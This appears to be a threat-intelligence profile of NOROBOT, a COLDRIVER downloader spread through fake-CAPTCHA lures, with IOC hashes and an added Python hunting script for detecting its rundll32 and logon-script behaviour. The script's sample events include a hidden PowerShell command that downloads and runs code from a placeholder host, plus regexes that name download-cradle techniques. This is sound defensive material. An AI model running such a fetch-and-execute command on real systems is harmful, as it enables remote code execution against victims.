NOROBOT
NOROBOT is a downloader malware family in COLDRIVER’s (also tracked as Star Blizzard, UNC4057, and Callisto) 2025 “ROBOT” suite. Google Threat Intelligence Group (GTIG) reported that COLDRIVER deployed NOROBOT within days of public disclosure of its LOSTKEYS malware and continued iterating it from May through September 2025. NOROBOT is delivered through ClickFix-style fake CAPTCHA pages, including HTML lures referred to as COLDCOPY, which trick victims into executing the malware via rundll32.exe. GTIG described NOROBOT as being in constant development to evade detection.
Its role is to stage follow-on payloads and establish persistence. Reported NOROBOT variants fetched additional files, set up persistence via a Windows logon script, and in other reporting established persistence via registry modifications and scheduled tasks. Early versions prepared the host for the Python backdoor YESROBOT, including downloading a full Python 3.8 installation, while later versions delivered the PowerShell backdoor MAYBEROBOT, which became COLDRIVER’s preferred follow-on implant. GTIG observed a simplified NOROBOT variant in early June 2025 that fetched a single file to create a logon script, which then executed PowerShell to download and run MAYBEROBOT. GTIG also reported that COLDRIVER repeatedly changed NOROBOT’s DLL name, export name, infrastructure, file naming conventions, retrieval paths, and cryptographic key handling to hinder detection and reconstruction of the full infection chain.
The malware is associated with Russian state-sponsored espionage activity attributed to COLDRIVER. Reported targeting includes high-value victims in policy, NGO, academic, government, think tank, journalist, media, dissident, and civil society contexts, with the objective of intelligence collection and information theft from compromised devices. Indicators reported for this family include the NOROBOT sample hash 3b49904b68aedb6031318438ad2ff7be4bf9fd865339330495b177d5c4be69d1 and the related next-stage PowerShell payload hash b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9. Zscaler tracks NOROBOT as BAITSWITCH.
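The delivery and persistence pattern summarized above (a DLL run through rundll32.exe from a ClickFix lure, then a logon script that runs a PowerShell download cradle for the next stage) maps directly onto process-creation telemetry. The following is an added hunting example, not code from GTIG, Zscaler or Mallory: it runs the two reported hashes and three behavioral checks over a handful of constructed Sysmon-style events. The assumptions that are not from the page are the field names (Sysmon Event ID 1), that a ClickFix victim pastes the command into the Win+R Run dialog so rundll32.exe is spawned by explorer.exe, that the logon script is executed under userinit.exe, and the sample DLL name, export name and URL, which are placeholders.

```python
"""Hunt checks for the NOROBOT delivery/persistence pattern.

Added example; not the vendors' code. Field names follow Sysmon Event ID 1.
Assumptions: ClickFix commands pasted into Win+R give rundll32.exe a parent
of explorer.exe; the logon script runs under userinit.exe. Sample events
below are constructed.
"""
import re
from dataclasses import dataclass

# Hashes reported for NOROBOT and its next-stage PowerShell payload (from the profile text).
KNOWN_HASHES = {
    "3b49904b68aedb6031318438ad2ff7be4bf9fd865339330495b177d5c4be69d1": "NOROBOT DLL",
    "b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9": "next-stage PowerShell payload",
}

# rundll32 invocation with a DLL path and an export name (the form a ClickFix lure has the user run).
RUNDLL32_ENTRY = re.compile(r'(?i)rundll32(\.exe)?"?\s+"?([^"\s,]+\.dll)"?\s*,\s*(\w+)')
# Directories writable without elevation; rundll32 loading a DLL from here is worth a look.
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\|\\programdata\\|\\temp\\"
)
# Common PowerShell download-cradle fragments (the reported logon script downloaded and ran the next stage).
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|bitstransfer|-enc(odedcommand)?\b)"
)


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str
    sha256: str = ""


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every check this event trips (empty list if benign)."""
    findings = []
    if ev.sha256.lower() in KNOWN_HASHES:
        findings.append(f"ioc-hash:{KNOWN_HASHES[ev.sha256.lower()]}")
    image, parent = ev.image.lower(), ev.parent_image.lower()
    if image.endswith("rundll32.exe"):
        m = RUNDLL32_ENTRY.search(ev.command_line)
        if m and USER_WRITABLE.search(m.group(2)):
            findings.append("rundll32-user-writable-dll")
        if m and parent.endswith("explorer.exe"):
            findings.append("rundll32-from-run-dialog")  # assumption: Win+R paste pattern
    if image.endswith(("powershell.exe", "pwsh.exe")) and DOWNLOAD_CRADLE.search(ev.command_line):
        findings.append("powershell-download-cradle")
        if parent.endswith("userinit.exe"):  # assumption: logon-script execution context
            findings.append("logon-script-download-cradle")
    return findings


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that tripped at least one check."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample telemetry: one ClickFix-style rundll32 launch carrying the reported
# NOROBOT hash, one logon-script PowerShell cradle, and two benign events.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\rundll32.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'"C:\Windows\System32\rundll32.exe" "C:\Users\alice\AppData\Local\Temp\verify.dll",Check',
        sha256="3b49904b68aedb6031318438ad2ff7be4bf9fd865339330495b177d5c4be69d1",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\System32\userinit.exe",
        command_line="powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')\"",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\rundll32.exe",
        parent_image=r"C:\Windows\System32\svchost.exe",
        command_line=r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r"powershell.exe -File C:\Users\bob\scripts\report.ps1",
    ),
]

if __name__ == "__main__":
    for idx, findings in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, findings)
```

The hash check is the only high-confidence rule; the three behavioral checks are triage heuristics that will also fire on some administrative activity, so tune the parent-process and path conditions to your environment before alerting on them.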
Groups observed using it
1 distinct threat actor (COLDRIVER) attributed by public researchers.
"The new infection chain, themed around CAPTCHA lures, features a family of malware we’ve named the “ROBOT” suite: NOROBOT: A downloader that has been in constant development to evade detection."
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
"Typically, the threat group deploys malware in phishing attacks..."
Execution
2 techniques
"NOROBOT gains persistence through registry modifications and scheduled tasks..."
"The new infection chain, themed around CAPTCHA lures, features a family of malware we’ve named the “ROBOT” suite"
Persistence
3 techniques
"...fetches a single file, which we observed to be a single command that sets up a logon script for persistence. The logon script was a Powershell command which downloaded and executed the next stage..."
"NOROBOT gains persistence through registry modifications and scheduled tasks..."
Privilege Escalation
3 techniques
"...fetches a single file, which we observed to be a single command that sets up a logon script for persistence. The logon script was a Powershell command which downloaded and executed the next stage..."
"NOROBOT gains persistence through registry modifications and scheduled tasks..."
Defense Evasion
2 techniques
"...complex delivery chain that splits cryptographic keys across multiple components. Decrypting the final payload depended on combining the pieces correctly..."
"...tricked the target into executing it via rundll32 under the guise of a verification process."
Command and Control
1 technique
"NOROBOT: A downloader that has been in constant development to evade detection."
Recent activity
7 sources tracked across advisories, community write-ups, and news.
A COLDRIVER-attributed set of lightweight custom tools referred to as the ROBOT chain (NOROBOT/YESROBOT/MAYBEROBOT), reported in 2025 and associated with ClickFix-style delivery. That source frames it as newly reported malware used by COLDRIVER but gives no technical detail beyond identifying it as a distinct malware/tooling set.
Multi-stage espionage malware delivered via fake CAPTCHA/ClickFix social engineering; uses evolving delivery chains and encrypted payload handling (including variants that split cryptographic key material across components) and can establish persistence (e.g., via logon script).
DLL-based first-stage component delivered via an HTML ClickFix lure (COLDCOPY) and executed with rundll32.exe to drop/launch subsequent-stage malware in the ROBOT chain.
Malicious DLL delivered via ClickFix (fake CAPTCHA) social engineering and executed with rundll32. Used as an initial-stage loader/dropper to establish persistence (registry changes, scheduled tasks) and deliver follow-on backdoors (initially a Python-based backdoor, later a PowerShell backdoor).